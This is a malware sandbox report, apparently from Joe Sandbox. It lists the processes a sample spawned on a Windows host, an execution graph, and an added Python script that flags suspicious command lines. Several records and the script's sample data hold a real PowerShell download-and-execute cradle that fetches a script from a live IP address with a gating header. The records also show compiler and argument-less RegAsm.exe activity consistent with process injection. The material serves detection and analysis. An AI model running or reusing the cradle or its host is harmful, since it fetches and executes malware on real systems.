                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:20:18:12
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:20:18:12
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x3b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x5b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x480000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:20:18:18
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0xb10000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:20:18:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:20:18:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x370000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x370000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:20:18:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x9b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true
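The process list above shows the whole on-host chain in three recurring shapes: powershell.exe running an `iwr ... | iex` download cradle against `http://147.45.44.131/infopage/ybfh.ps1` with a custom `X-Special-Header`, csc.exe and cvtres.exe compiling script-generated source out of `%LOCALAPPDATA%\Temp`, and RegAsm.exe started with no arguments at all (nothing to register, which fits the "Injects a PE file into a foreign processes" signature). The following triage script is an added example, not part of the Joe Sandbox report: it runs those three checks over process records, using sample records copied from the command lines on this page; the rule names and the `Finding` type are my own.

```python
"""Added triage example: run simple detection rules over sandbox process records.

Not part of the Joe Sandbox report. The sample records are copied from the
command lines shown in the process list; the rule names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    target_id: int
    rule: str
    detail: str


# Constructed from the report's Target ID 20, 22, 23, 30 and 21 entries:
# (target id, image path as resolved by the sandbox, raw command line).
SAMPLE_PROCESSES = [
    (20, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"'''),
    (22, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'''"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"'''),
    (23, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'''C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"'''),
    (30, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     r'"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"'),
    (21, r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

DOWNLOAD = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|"
    r"new-object\s+net\.webclient|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
HEADER_TABLE = re.compile(r"-Headers\s*@\{([^}]*)\}", re.I)
HEADER_NAME = re.compile(r"'([^']+)'\s*=")
# Directories an unprivileged user can write to; compiler input coming from
# here is script-generated code, not a developer build.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\windows\\temp\\", re.I)


def extract_headers(cmdline):
    """Names of custom HTTP headers passed via -Headers @{...}."""
    m = HEADER_TABLE.search(cmdline)
    return HEADER_NAME.findall(m.group(1)) if m else []


def _image_name(image):
    return image.rsplit("\\", 1)[-1].lower()


def _arguments(cmdline):
    """Command line with the (possibly quoted) program path removed."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1] if len(parts) > 1 else ""


def analyze(target_id, image, cmdline):
    """Apply the rules to one process record. Match on the image path the
    sandbox resolved, not on the path in the command line: under WoW64 the
    command line says System32 while the file that ran lives in SysWOW64."""
    exe = _image_name(image)
    args = _arguments(cmdline)
    findings = []
    if exe in ("powershell.exe", "pwsh.exe") and DOWNLOAD.search(args) and EXECUTE.search(args):
        urls = ", ".join(URL.findall(args)) or "<no URL literal>"
        headers = extract_headers(args)
        detail = f"download-and-execute cradle for {urls}"
        if headers:
            # A custom header often gates the payload (the server answers only
            # when it is present), so replay it when fetching for analysis.
            detail += f"; custom request header(s): {', '.join(headers)}"
        findings.append(Finding(target_id, "powershell_download_cradle", detail))
    if exe in ("csc.exe", "vbc.exe") and USER_WRITABLE.search(args):
        findings.append(Finding(target_id, "dotnet_compiler_from_user_dir",
                                "compiles source from a user-writable directory"))
    if exe == "cvtres.exe" and USER_WRITABLE.search(args):
        findings.append(Finding(target_id, "cvtres_from_user_dir",
                                "resource conversion for a Temp-built assembly"))
    if exe == "regasm.exe" and args == "":
        findings.append(Finding(target_id, "regasm_without_arguments",
                                "no assembly to register; consistent with use as an injection target"))
    return findings


def triage(processes):
    """Run analyze() over (target id, image, command line) tuples."""
    findings = []
    for target_id, image, cmdline in processes:
        findings.extend(analyze(target_id, image, cmdline))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PROCESSES):
        print(f"[{f.rule}] Target ID {f.target_id}: {f.detail}")
```

Feed it the (Target ID, Path, Commandline) triples from a report and it flags Target IDs 20, 22, 23 and 30 while ignoring the benign conhost.exe record. The argument-less RegAsm.exe check is deliberately strict (empty argument list only); legitimate RegAsm invocations always name an assembly.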


                                                            Execution Graph

                                                            Execution Coverage:4.7%
                                                            Dynamic/Decrypted Code Coverage:95.7%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:70
                                                            Total number of Limit Nodes:4

                                                            Execution graph, one node per line: node ID, address (in the 0xB50000 dump unless it starts with 73d), API called at that node if any, and outgoing edges.

                                                            Component reaching EnumThreadWindows:
                                                            7257 b57cb0 -> 7258, 7259
                                                            7258 b57cf4 -> 7259
                                                            7259 b57cfe EnumThreadWindows -> 7260
                                                            7260 b57d30

                                                            Component reaching GetCurrentThreadId:
                                                            7261 b569df -> 7264
                                                            7264 b56238 -> 7265
                                                            7265 b56243 -> 7268
                                                            7268 b57bb0 -> 7269
                                                            7269 b57c0f GetCurrentThreadId -> 7271
                                                            7271 b57c55 -> 7266
                                                            7266 b569ec

                                                            Component reaching DuplicateHandle:
                                                            7272 b563c8 DuplicateHandle -> 7273
                                                            7273 b5645e

                                                            Component reaching MessageBoxW:
                                                            7274 b58448 -> 7275
                                                            7275 b58463 MessageBoxW -> 7277
                                                            7277 b584d4

                                                            Component rooted at 73d01c (GetActiveWindow, GetCurrentProcess/Thread, OleInitialize):
                                                            7278 73d01c -> 7279
                                                            7279 73d030 -> 7280, 7284, 7289, 7292
                                                            7280 73d070
                                                            7284 b50874 -> 7285, 7286
                                                            7285 b50832 -> 7296
                                                            7286 b50882
                                                            7287 b50869 -> 7280
                                                            7289 b50848 -> 7291
                                                            7290 b50869 -> 7280
                                                            7291 b54dbd (6 API calls) -> 7290
                                                            7292 b50838 -> 7293
                                                            7293 b50848 -> 7294
                                                            7294 b54dbd (6 API calls) -> 7295
                                                            7295 b50869 -> 7280
                                                            7296 b54dbd -> 7297
                                                            7297 b54e33 -> 7298, 7299, 7300
                                                            7298 b54f47 GetActiveWindow -> 7299
                                                            7299 b54f75 -> 7300, 7305, 7309, 7313, 7317
                                                            7300 b54fe7 -> 7287
                                                            7305 b55730 -> 7306
                                                            7306 b55739 -> 7320
                                                            7309 b55758 -> 7310
                                                            7310 b55768 -> 7311, 7337
                                                            7311 b55785 -> 7300
                                                            7313 b55749 -> 7314
                                                            7314 b55768 -> 7315, 7316
                                                            7315 b54d38 (4 API calls) -> 7316
                                                            7316 b55785 -> 7300
                                                            7317 b5571f -> 7318, 7319
                                                            7318 b55744 -> 7300
                                                            7319 b54d28 (5 API calls) -> 7318
                                                            7320 b54d28 -> 7321
                                                            7321 b54d33 -> 7322, 7324
                                                            7322 b569a2
                                                            7324 b56228 -> 7325
                                                            7325 b56233 -> 7326, 7329
                                                            7326 b55758 (4 API calls) -> 7327
                                                            7327 b56a9b -> 7330
                                                            7329 b56a81 -> 7322
                                                            7330 b5630c -> 7331
                                                            7331 b56317 -> 7332, 7334
                                                            7332 b56dbb -> 7329
                                                            7334 b56328 -> 7335
                                                            7335 b56df0 OleInitialize -> 7336
                                                            7336 b56e54 -> 7332
                                                            7337 b54d38 -> 7338
                                                            7338 b54d43 GetCurrentProcess -> 7340, 7341
                                                            7340 b55e10 GetCurrentThread -> 7342, 7343
                                                            7341 b55e09 -> 7340
                                                            7342 b55e46 -> 7343
                                                            7343 b55e4d GetCurrentProcess -> 7346
                                                            7344 b55eab GetCurrentThreadId -> 7345
                                                            7345 b55edc -> 7311
                                                            7346 b55e83 -> 7344

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55DF6
                                                            • GetCurrentThread.KERNEL32 ref: 00B55E33
